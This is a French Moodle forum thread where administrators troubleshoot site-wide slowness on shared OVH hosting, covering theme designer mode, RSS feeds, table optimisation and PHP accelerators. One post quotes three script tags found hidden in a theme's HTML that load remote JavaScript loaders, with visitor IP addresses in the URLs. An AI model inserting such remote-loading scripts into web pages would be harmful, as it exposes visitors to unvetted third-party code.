Lenteur générale

Lenteur générale

par Jean-Luc KRIEGEL,
Nombre de réponses : 16

Bonjour , je n'ai pas trouvé si mon post fait doublon ou pas

J'ai un gros problème de lenteur généralisé sur tout mon site, suis en version 1.9.16+

des solutions ??

Merci d'avance

Moodlement votre,

Moyenne des évaluations  -
En réponse à Jean-Luc KRIEGEL

Re: Lenteur générale

par Guy Veyssière,

Bonjour Jean-Luc,

Doublon, je n'en sais rien, moi-même je sors jsute d'une crise de lenteur mais il est probable que la cause est différente.

J'ai donc remarqué que dans le paramètrage des thèmes il y a une case Mode développeur qui fait que les pages php sont recréées à chaque visite, ça ça ralentit beaucoup, vérifie.

La solution qui a fonctionné sans du tout régler le problème chez moi, j'ai changé de version.

Dans le cadre des solutions qu'on sait pas pourquoi, j'ai du a un moment ré-installer la base de données depuis une sauvegarde. Enfin tout ça c'est dans le genre remise à neuf ou état sorti d'usine, pas un diagnostic.

Sinon je pense qu'ill faut que tu donnes des infos :

Ta lenteur elle date d'hier ?

Es-tu intervenu sur quelque chose ?

Chez quel hébergeur es-tu ?

Courage, on a tous souffert au moins une fois, moi beaucoup de fois.

Guy

En réponse à Guy Veyssière

Re: Lenteur générale

par jean-paul KIRKBRIDE,

Bonjour,

j'ai eu beaucoup de problème de performance il y a quelques mois.

Tout a été résolu en désactivant le plugin RSS => dans les logs, en permanence des requêtes HTTP de flux RSS étaient générées....

Si cela peut aider...

Jean-Paul

En réponse à Guy Veyssière

Re: Lenteur générale

par Jean-Luc KRIEGEL,

Bonjour à tous,

Je suis chez OVH sur un mutualisé

cela date depuis longtemps mais j'ai 3 moodle 1.9 de même version dans une même grosse base de données et cette lenteur est très longue sur une seul plateforme

Sur les autres la lenteur est moins significative

chez cherché dans les thèmes pour voir l'option développeur, je ne l'ai pas trouvé

j'ai cherché le plugin rss, je ne le trouve pas non plus

Merci pour la doc mais l'anglais et moi ca fait deux

Merci pour votre aide précieuse

Moodlement votre,

En réponse à Jean-Luc KRIEGEL

Re: Lenteur générale

par Guy Veyssière,

Je suis aussi chez OVH mutu donc ça vient pas de ça. D'un autre côté tu peux les contacter par mail c'est gratuit et ils répondent pour moi sous 24 heures.

Pour le mode développeur qui en fait s'appelle Mode concepteur de thème dans la version que j'utilise :

Administration du site / Présentation / Thèmes / Réglages thèmes.

Guy

En réponse à Guy Veyssière

Re: Lenteur générale

par Philippe DONNART,

"Je suis aussi chez OVH mutu donc ça vient pas de ça."

Guy je ne suis pas trop d'accord avec cette idée.
Sur un mutualisé tu partages un serveur avec d'autres sites, donc les performances peuvent changer d'un serveur à un autre.
Si, par exemple, un des sites se fait attaquer, et sert à envoyer un grand nombre de spams, cela peut ralentir le serveur (ça m'est arrivé chez OVH, c'est moi qui avait été attaqué).

Il peut s'agir également d'un nouvel arrivant sur le serveur, nouvel arrivant qui utilise un script qui "bouffe les ressources".

Donc pour pouvoir dire cela il faudrait être sur le même serveur.

En réponse à Philippe DONNART

Re: Lenteur générale

par Guy Veyssière,

Bonjour Philippe,

Oui je ne peux qu'être d'accord sourire

Je voulais parler du fonctionnement général chez OVH, maintenant au sujet de son serveur je sais que tout est possible. Ta précision est importante effectivement.

Guy

En réponse à Philippe DONNART

Re: Lenteur générale

par Jean-Luc KRIEGEL,

Bonjour Philippe,

Bon je viens de fouiller mes 4 plateformes et je trouve ce code caché dans le html d'une plateforme avec le thème de HEC qui est dans les themes téléchargeables

<script type="text/javascript" src="http://loading-resource.com/50.js.php?i={7076E461-1F3B-4176-86C7-77E4C0F69853}"></script>
<script src="https://d3lvr7yuk4uaui.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=FR&rid=B7&ccid=Jaunay-clan&ip=82.233.87.242" type="text/javascript"></script>
<script type="text/javascript" src="https://d3lvr7yuk4uaui.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=FR&rid=B7&ccid=Jaunay-clan&ip=77.205.223.70"></script>

Est ce que ce ne serait pas ce qui me pourrit mes plateformes, dont une plus que d'autres.

Et comment vous avez su que vous avez été "attaqué" ?

Merci pour vos réponses

En réponse à Jean-Luc KRIEGEL

Re: Lenteur générale

par Philippe DONNART,

Bonjour

Je ne sais pas cce qu'est http://loading-resource.com
Peut être est ce normal.

La première fois il s'agissait du CMS Plume et OVH avait suspendu mon site, qu'il m'a fallu nettoyer.

Récemment c'est sur mon dédié et Wordpress, nous recevions du spam à une adresse email (des messages renvoyés par des destinataires qui n'existaient pas) en fouillant dans les répertoires j'ai trouvé des fichiers qui avaient été rajoutés par des hackers (faille sur Timthumb.php dans un theme).

Philippe

En réponse à Philippe DONNART

Re: Lenteur générale

par Jean-Luc KRIEGEL,

Merci Philippe,

 

j'ai fouillé et rien trouvé

J'ai contacté OVH pour voir si eux ils trouvents quelque chose

@+

Jluc

En réponse à Jean-Luc KRIEGEL

Re: Lenteur générale

par Éric Bugnet,
Avatar Développeurs de plugins Avatar Documentation writers Avatar Traducteurs

Bonjour,

Prend le temps de faire une sauvegarde complete avant d'apporter des modifs !

 

Je te conseille de prendre le temps de lire cette partie de la doc.

http://docs.moodle.org/20/en/Performance_recommendations

http://docs.moodle.org/20/en/Performance_settings

Tu verras des conseils de réglages, et que moodle « vieillis », du moins sa base de données.

Il est alors conseillé de faire des CHECK et OPTIMISE sur les tables importantes (après toutes les update en fait...!).

Selon les versions, (je ne me souviens plus sur la 1.9) tu as un outil de vérification des tables (notament des index inexistants) qui peut apporter des indications sur la réparation à apporter. Sur la 2 c'est : Server admin / Dev / XMLDB editor / Checke indexes et les autres.

j'ai aussi installé un accélérateur php (APC), ça a aidé un peu.

Un update de ton serveur...

La question peut être aussi à cause du serveur, pas que de moodle...

Éric

En réponse à Éric Bugnet

Re: Lenteur générale

par jean-paul KIRKBRIDE,

J'avais suivi tous les conseils que tu trouveras sur les liens indiqués, installé APC,....

Pour savoir si RSS est installé :

Administration -> Plugins -> Blocs -> Gestion des blocs -> Flux RSS : Supprimer.

Bon courage !

En réponse à Éric Bugnet

Re: Lenteur générale

par Jean-Luc KRIEGEL,

Bonjour Eric,

 

pourrais tu m'en dire un peu plus sur l'accélérateur php

 

merci

En réponse à Jean-Luc KRIEGEL

Re: Lenteur générale

par Patrick Lemaire,
Avatar Développeurs de plugins Avatar Documentation writers Avatar Moodleurs particulièrement utiles Avatar Testeurs Avatar Traducteurs

Bonjour,

Juste pour évoquer la "coïncidence" troublante, nous avons été victime de ce que ma DSI a qualifié d'une attaque par Déni de Service ce Lundi 16 janvier...

Je trouve cette vague de ralentissement assez étrange ?
J'ai tout mis à jour mais le nombre de requête reste élevé.
Pas de traces d'effraction à l'intérieur que ce soit système ou applicatif. Faut dire que nous avons réagit en moins de 10 minutes cool
Merci à ma DSI au passage.

Y aurait une vendetta contre Moodle ?

A bientôt,
Patrick